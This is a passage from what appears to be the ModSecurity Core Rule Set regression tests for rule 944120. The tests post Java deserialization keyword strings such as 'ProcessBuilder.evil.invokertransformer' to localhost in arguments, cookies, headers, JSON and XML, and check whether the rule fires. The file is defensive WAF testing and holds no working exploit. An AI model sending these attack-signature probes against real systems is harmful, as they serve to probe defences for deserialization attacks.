- Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-64 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 
- headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-65 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-66 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-67 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-68 - desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-69 - desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-70 - desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-71 - desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-72 - desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-73 - desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-74 - desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-75 - desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-76 - desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-77 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-78 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-79 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-80 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" 
- Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-81 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.invokertransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-82 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.invokertransformer\": 
\"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-83 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.invokertransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-84 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.invokertransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-85 - desc: "Argument test includes 
keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-86 - desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-87 - desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - 
test_title: 944120-88 - desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-89 - desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-90 - desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - 
- - - test_title: 944120-91 - desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-92 - desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-93 - desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-94 - desc: "Nested XML element value includes keyword 
ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-95 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-96 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-97 - desc: "Content-Type 
application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-98 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-99 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-100 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeclonefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-101 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeclonefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-102 - desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-103 - desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 